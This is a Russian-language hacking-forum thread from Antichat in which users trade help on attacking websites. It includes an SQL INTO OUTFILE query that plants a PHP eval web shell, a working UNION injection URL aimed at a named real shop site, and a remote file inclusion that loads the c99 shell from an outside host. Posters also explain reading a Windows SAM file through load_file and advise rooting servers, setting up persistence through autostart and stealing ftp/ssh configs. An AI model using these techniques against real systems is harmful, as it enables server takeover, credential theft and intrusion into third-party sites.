Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Через MySQL залить можно, а вот выполнить нет.
    Если у пользователя из под которого запущено текущее соединение File_Prive = Y то можно залить так
    Code:
    SELECT c FROM t UNION ALL SELECT '<?php eval($_GET[ev]);?>' INTO OUTFILE 'путь_до_каталога_видного_из_веба/название.расширение'
    и потом уже запустить из под веба http://HOST/название.расширение?ev=phpinfo();
    Дальше заливаешь нормальный шелл, и делаешь что тебе нужно.
     
    _________________________
    #15801 Expl0ited, 6 Jan 2011
    Last edited: 6 Jan 2011
    2 people like this.
  2. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,055
    Likes Received:
    615
    Reputations:
    690
    2Chest3r залей шелл , и потом пофантазируй как и что можно ...
    напрмиер можно батник засунуть в автозагрузку и ждать ребута (или найти вариант ребутнуть сервак) или.... с шелла можешь уже поковырять все конфиги (если прав будет) и там уже будет видно ...

    P.S мб словишь конфиги к ftp/ssh/etc...
     
    _________________________
  3. Chest3r

    Chest3r New Member

    Joined:
    14 Nov 2009
    Messages:
    40
    Likes Received:
    4
    Reputations:
    4
    Вобщем, дело сделано, но частично. Отдельное спасибо товарищам CodeSender, Ponchik и ornot!
    А дело было так! Первоначально файл был прочитан путем хексирования в SQL-запросе - hex(load_file(0x633a5c77696e646f77735c7265706169725c73616d)) , далее сохранил страницу в браузере полностью, открыл в блокноте, обрезал лишнее, а потом конвертировал всю эту муть в HEX-редакторе.
    Далее файл успешно был скормлен программе SAMInside, однако эта программка как и следовало ожидать, еще и потребовала файл SYSTEM. Тут к сожалению облом - файл весит почти 4 мегабайта и на странице ничего не отображается. Есть какие нибудь идеи по этому поводу? Порылся по разным форумам, нигде не встретилось чтение большого файла через SQL-иньекцию.
    Спасибо! Обязательно попробую.
    О_о Классная идея! Почему раньше об этом не подумал... Спасибо!
     
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    я не знаю может ли такое даже работать, но попробуй например обрезать какнибудь.
    substring(LOAD_FILE(''),1,1000) если получится то просто скрипт написать и вытащить потихоньку
     
    1 person likes this.
  5. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Как-то я не особо понял что там такого сложного
    Code:
    http://www.masterpiecedistribution.com/shop/ultime_uscite.php ?order_id= &id=-22381 union select 1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 -- 1
     
  6. USERDEAD

    USERDEAD New Member

    Joined:
    12 Oct 2010
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Вопрос про уязвимость

    На одном сайте пожно в файлообменняк загрузить файл любого разширения, кстати файлы php исполняются, как можно использовать данную весчь
     
    #15806 USERDEAD, 6 Jan 2011
    Last edited: 6 Jan 2011
  7. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,055
    Likes Received:
    615
    Reputations:
    690
    у меня классная идея!!! залить php скрипт!
    P.S если без шуток то залей шелл и порутай сервак )
     
    _________________________
    #15807 shell_c0de, 6 Jan 2011
    Last edited: 6 Jan 2011
    4 people like this.
  8. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,055
    Likes Received:
    615
    Reputations:
    690
    да.......
     
    _________________________
  9. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    следующий вопрос.
    Имеем инъекцию, будем считать, что нам ничего не мешает раскрутить ее и получить логин,хэш админа.
    Но бывает так, что эти действия бесполезны,т.к. админка находится не на самом уязвимом ресурсе, а на хостере, напримеР, http://www.vul-sait.com:2082/
    То есть в админку нам не попасть.

    Тут и возникают несколько вопросов.

    Может быть все таки можно что то делать дальше?
    Если не попасть в админку, то как посредством sql через инъекцию редактировать/слить БД, сделать дефейс ну и т.д....всевозможные действия..?
     
  10. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    а может там всё таки просто есть админка, но ты её найти не можешь?
     
  11. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    пускай даже я не могу ее найти.

    Интересно, что можно делать используя sql
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    если у тебя иньекция в запросе селект то можеш только "слить" как ты сказал выше. редактировать и тп ни как не сможеш
    смотри file_priv у пользователя, если повезет сможеш еще файлы читать.
    смотри права на базу mysql, ищи PMA..

    больше ничего.

    дефейсы на ачате не обсуждаются.
     
    _________________________
    #15812 Konqi, 7 Jan 2011
    Last edited: 7 Jan 2011
    1 person likes this.
  13. NorB

    NorB Elder - Старейшина

    Joined:
    20 Jul 2007
    Messages:
    109
    Likes Received:
    12
    Reputations:
    -2
    Есть запрос вида

    /newslist.php?box=5

    пишу newslist.php?box=5+and+1=0+union+select+1,2,3,4,5+--

    эот уже определил что 5 столбцов, выводит ошибку вида:

    Warning: ibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 92 in /ishop/www/tid1/newslist.php on line 35


    А если без коментирования остатка (newslist.php?box=5+and+1=0+union+select+1,2,3,4,5+)запроса то такую ошибку:

    Warning: ibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 Token unknown - line 1, column 95 order in /ishop/www/tid1/newslist.php on line 35

    Warning: ibase_fetch_object(): supplied argument is not a valid Firebird/InterBase result resource in /ishop/www/tid1/newslist.php on line 36


    Как дальше раскрутить это все дело?.. во всех этих моментах нету вывода куда либо кроме того где ошибки=\
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    NorB

    http://forum.antichat.ru/threadedpost1826253.html
     
    _________________________
    #15814 Konqi, 7 Jan 2011
    Last edited: 7 Jan 2011
  15. NorB

    NorB Elder - Старейшина

    Joined:
    20 Jul 2007
    Messages:
    109
    Likes Received:
    12
    Reputations:
    -2
    Огромное спасибо, мне нраааааавица ваше прикольна %) чета новенькое изучу%)
     
    #15815 NorB, 7 Jan 2011
    Last edited: 7 Jan 2011
  16. street16

    street16 Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    42
    Likes Received:
    5
    Reputations:
    1
    Всем доброго времени!!Есть админка!!заливаю картинку с содержимым шелла!выдает хрень Warning: realpath() [function.realpath]: SAFE MODE Restriction in effect. The script whose uid is 99 is not allowed to access!Но если залить с содержимым,ну например $a=5;echo $a;то все нормуль!не подскажите че может быть?
     
  17. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Не понятно. Жалуется он очевидно почему, потому что на сервере включен режим SAFE MODE, и владелец каталога куда заливается шелл отличен от владельца загружаемого шелла.
    Непонятно то, почему у тебя исполняется как ты написал:
    [qoute] $a=5;echo $a[/qoute]
     
    _________________________
    1 person likes this.
  18. pycmep

    pycmep New Member

    Joined:
    17 Aug 2010
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Тренеруюсь на локальном сервере в sql-inj

    Вот такой запрос к бд в скрипте.
    Делаю скулю так
    И так:
    Ошибка:
    Если в скрипте прописать так:
    То всё работает.

    Столбцов в таблице 2, записей 3.

    В чём моя ошибка? :(

    ps: Использовал оператор group by всё нормально работает, а с union никак не хочет.
     
  19. Onkelz

    Onkelz New Member

    Joined:
    22 Sep 2010
    Messages:
    38
    Likes Received:
    2
    Reputations:
    -1
    Вопрос может и глупый, но раньше я никогда не стыкался с заливкой шелла. И вот решил попробовать.

    ххх.com/index.php?con=http://site.com/c99madshell

    на страице открывает шелл , с моим сайтом. ТАк должно быть ?


    потом перехожу
    ххх.com/с99madshell.php но такого файла нет. В чем проблема собствено. ?

    Если нада доп. инфа говорите.
     
  20. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Вероятно, потому что в первом примере, ты пишешь selest, вместо select
     
Loading...
Thread Status:
Not open for further replies.